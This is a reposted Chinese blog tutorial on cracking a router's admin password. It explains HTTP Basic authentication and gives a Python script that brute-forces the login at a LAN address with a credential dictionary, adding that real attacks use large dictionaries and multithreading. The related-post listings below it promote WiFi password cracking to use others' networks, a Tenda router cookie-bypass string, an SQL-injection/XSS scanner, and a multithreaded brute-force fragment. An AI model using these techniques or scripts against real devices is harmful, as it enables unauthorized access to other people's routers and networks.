关于破解路由器密码

最新推荐文章于 2022-04-27 08:54:01 发布
转载 最新推荐文章于 2022-04-27 08:54:01 发布 · 69 阅读 · 1 ·
CC 4.0 BY-SA版权
原文链接:http://www.cnblogs.com/jxldjsn/p/7010898.html
文章标签:

#移动开发 #python

http://daily.zhihu.com/story/3603866?utm_campaign=in_app_share&utm_medium=Android

先看看上面的那个文章

------------

Evi1m0大牛破解了路由器的连接密码之后,又破解了路由器的管理登陆密码,这个过程就是一笔带过,在这里详细的说一下。

首先说什么是http basic认证

在HTTP协议进行通信的过程中,HTTP协议定义了基本认证过程以允许HTTP服务器对WEB浏览器进行用户身份证的方法,当一个客户端向HTTP服务 器进行数据请求时,如果客户端未被认证,则HTTP服务器将通过基本认证过程对客户端的用户名及密码进行验证,以决定用户是否合法。客户端在接收到HTTP服务器的身份认证要求后,会提示用户输入用户名及密码,然后将用户名及密码以BASE64加密,加密后的密文将附加于请求信息中, 如当用户名为anjuta,密码为:123456时,客户端将用户名和密码用“:”合并,并将合并后的字符串用BASE64加密为密文,并于每次请求数据 时,将密文附加于请求头(Request Header)中。HTTP服务器在每次收到请求包后,根据协议取得客户端附加的用户信息(BASE64加密的用户名和密码),解开请求包,对用户名及密码进行验证,如果用 户名及密码正确,则根据客户端请求,返回客户端所需要的数据;否则,返回错误代码或重新要求客户端提供用户名及密码。

我们先抓包看看http头是什么样的。

我使用的是firefox + tamper data,首先是安装这个插件。

https://addons.mozilla.org/zh-CN/firefox/addon/tamper-data/?src=search

安装之后,按alt,就能显示菜单栏了,工具 -- tamper data,

 

开路由器的登录网址,我的是http://192.168.1.253 

点击上面的start tamper,然后输入账号密码,

点击tamper,拦截这个请求,然后可以看到

 

看到Authorization这个了吧,后面跟的明显是base64编码的内容,我们解码看看

 

这就是我们的账号密码中间加一个冒号,然后base64编码。

基本原理明白了,我们就可以去写程序破解了。

找一个账号密码字典,然后编码,加到http头,就是这个easy。

复制代码
#coding:utf-8
import base64
import urllib2
password_dic = [["root", "root"], ["admin", "admin"], ["admin", "rootroot"]]
request = urllib2.Request('http://192.168.1.253')
#request.add_header('Authorization', 'Basic YWRtaW46cm9vdHJvb3Q=')
for item in password_dic:
    psw_base64 = "Basic " + base64.b64encode(item[0] + ":" + item[1])
    request.add_header('Authorization', psw_base64)
    try:
        response = urllib2.urlopen(request)
        print "Correct! Username: %s, password: %s" % (item[0], item[1])
        break
    except urllib2.HTTPError:
        print "Error!"
复制代码

使用了python自带的urllib2,上面password_dic就是自己随便写的,真正去破解的话,有很大的字典呢,而且多线程去跑。

request.add_header('Authorization', psw_base64)

就将我们构造的账号密码的http头加进去了。


看到了吧,最后破解出密码就是admin-rootroot。(你来攻击我啊~)

转载于:https://www.cnblogs.com/jxldjsn/p/7010898.html

wifi、热点密码破解 - python
weixin_51559599的博客
10-18 1万+
乐子脚本,有点小慢,试过多线程,系统 wifi 连接太慢了,需要时间确认,多线程的话系统根本反应不过来。也就可以试试破解别人的热点,一般都是 123456 这样的傻鸟口令。
干货|Python脚本破解Wifi
最新发布
dsuiofh的博客
04-15 2万+
今天小编分享一下如何通过 Python 脚本实现 WIFI 密码的暴力破解,从而实现免费蹭网。
不用登陆密码也能进路由器,适用于TP、磊科、腾达
weixin_30266885的博客
11-01 2311
结合wooyun提供的腾达COOKIE漏洞,结合自己的经验,成功进入腾达路由器破解其登陆密码和无线密码。 教程开始: 所用工具:WebCruiser 输入路由网关,出现登陆界面。 选择:COOKIE 然后再COOKIE输入:admin:language=cn,这时还不行,因为页面使用的缓存是没有注入COOKIE的,所以要删除http://192.168.0.1后面的字符。 ...
WebCruiser - Web Vulnerability Scanner(Web漏洞扫描器)
02-08
一个小巧但功能不凡的Web应用漏洞扫描器,能够对整个网站进行漏洞扫描,并能够对发现的漏洞(SQL注入,跨站脚本)进行验证;它也可以单独进行漏洞验证。 运行平台:Windows with .Net FrameWork 2.0或以上。 界面语言:英文版 功能简介: * 网站爬虫(目录及文件); * 漏洞扫描(SQL注入,跨站脚本); * 漏洞验证(SQL注入,跨站脚本); * SQL Server明文/字段回显/盲注; * MySQL字段回显/盲注; * Oracle字段回显/盲注; * DB2字段回显/盲注; * Access字段回显/盲注; * 管理入口查找; * GET/Post/Cookie 注入; * 搜索型注入延时; * 自动从自带浏览器获取Cookie进行认证; * 自动判断数据库类型; * 自动获取关键词; * 多线程; * 高级:代理、敏感词替换/过滤; * 报告; --------------------------------------------------- WebCruiser - Web Vulnerability Scanner A compact but powerful web security scanning tool! It has a Crawler and Vulnerability Scanner (SQL Injection, Cross Site Scripting). It can support not only scanning website, but also POC (Proof of concept) for web vulnerabilities: SQL Injection and Cross Site Scripting etc. Function: * Crawler(Site Directories And Files); * Vulnerability Scanner(SQL Injection, Cross Site Scripting); * POC(Proof of Concept): SQL Injection and Cross Site Scripting; * GET/Post/Cookie Injection; * SQL Server: PlainText/FieldEcho(Union)/Blind Injection; * MySQL/Oracle/DB2/Access: FieldEcho(Union)/Blind Injection; * Administration Entrance Search; * Password Hash of SQL Server/MySQL/Oracle Administrator; * Time Delay For Search Injection; * Auto Get Cookie From Web Browser For Authentication; * Multi-Thread; * Adcanced:Proxy,Escape Filter; * Report Output. Download: http://sec4app.com/download/WebCruiser.rar 帮助文档: CHM格式: http://sec4app.com/download/WebCruiserUserGuide.rar PDF格式: http://sec4app.com/download/WebCruiserUserGuide.pdf Demo视频: http://sec4app.com/files/Demo.html 不需要注册码;功能无限制。
WebCruiser
天堂鸟(积累备忘)
03-27 576
WebCruiser好东西,检测网站漏洞工具,xss、SQL注入。
PythonPython破解WiFi密码
liu100617的博客
04-27 3万+
不想交网费?不想交,那然我们一起蹭网吧!(不过劝你别用,一是费时间,二是网速也慢😂) 言归正传,首先你得有一台电脑,一个Python,还有pywifi。 ​​1.​​​​​下载pywifi 按下win+
破解路由器密码.txt
07-12
那么本文我就来总结几个破解路由器密码的方法以及如何实现内网中反弹木马的上线! 一.扫描路由器端口为了路由器的安全,网管通常都会将路由器的默认端口(80)给更改掉,所以我们破解路由器密码的第一步就是必须要找到...
破解路由器密码 telecomadmin.pdf
11-04
破解路由器密码 telecomadmin.pdf 本文档主要介绍了破解路由器密码 telecomadmin 的方案,共分为两个方案:ttl 破解方案和淘宝远程破解方案。下面将对这两个方案进行详细的介绍。 ttl 破解方案: 1. 首先需要购买...
锐捷路由器密码破解知识.pdf
02-09
"锐捷路由器密码破解知识" 路由器密码破解是IT行业中的一项高级技术,涉及到路由器的ROM监控模式、bootloader模式、配置文件管理等多方面的知识。本文将对锐捷路由器密码破解的整个过程进行详细的讲解和分析。 一...
最新破解路由器密码pin码
04-10
最新破解路由器密码pin码,如果您的无线路由器MAC地址以“C83A35”或“00B00C”打头, 输入后六位MAC地址(不分大小写)您或许可以获得该路由的WPS PIN密钥!
路由器密码破解工具
06-24
用于TP-link路由器,由路由器配置文件中提取路由器密码
python实现多线程暴力破解登陆路由器功能代码分享
12-23
运行时请在其目录下添加user.txt passwd.txt两文件。否则会报错。程序没有加异常处理。代码比较挫….. 复制代码 代码如下: #coding:utf-8- import base64 import urllib2 import Queue import threading,re,sys queue = Queue.Queue() class Rout_thread(threading.Thread):   def __init__(self,queue,passwd):     threading.Thread.__init__(self)     self.que
最简单的WIFI密码破解
02-06
最简单的WIFI密码破解: 无线路由器密码破解-BT3-spoonwep2 一、准备篇 1、一个有可破解无线信号的环境。如我在家随便搜索出来的信号。 2、带无线网卡的电脑一台(笔记本台式机均可,只要无线网卡兼容BT3),我用的是三星NC10的上网本。 3、2G以上优盘一个(我用的是kingston 8G 的) 4、搜索下载BT3,约900多兆。
破解路由器配置文件获取明文宽带账号和密码
01-20
破解路由器的配置文件以获取明文宽带账号和密码,附件含官方下载地址。
手把手教你破解无线路由器密码
热门推荐
Jiaxu的专栏
12-02 7万+
无线路由网络破解
WebCracker4.0和monster字典——路由器登陆密码破解工具
申杰的博客
07-14 7968
路由器登陆密码破解,很伤cpu的
如何在Windows平台用Java代码暴力破解WIFI密码
Tybyqi的博客
10-25 2万+
开始进入正题。在网上找了很多wifi破解工具,都是linux平台下用的,然后还不支持虚拟机装linux。因为很多笔记本装虚拟机都识别不了内置网卡。所以得把系统刻到U盘,然后用U盘启动。但是我现在穷得连一条内裤都没有了,哪来的U盘啊。于是就决定自己写,而且还得用Java写,写了我还得在windows上运行。 一、准备工作 首先你得需要一台能连wifi的电脑, 然后你的电脑得支持Java环境, 最...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值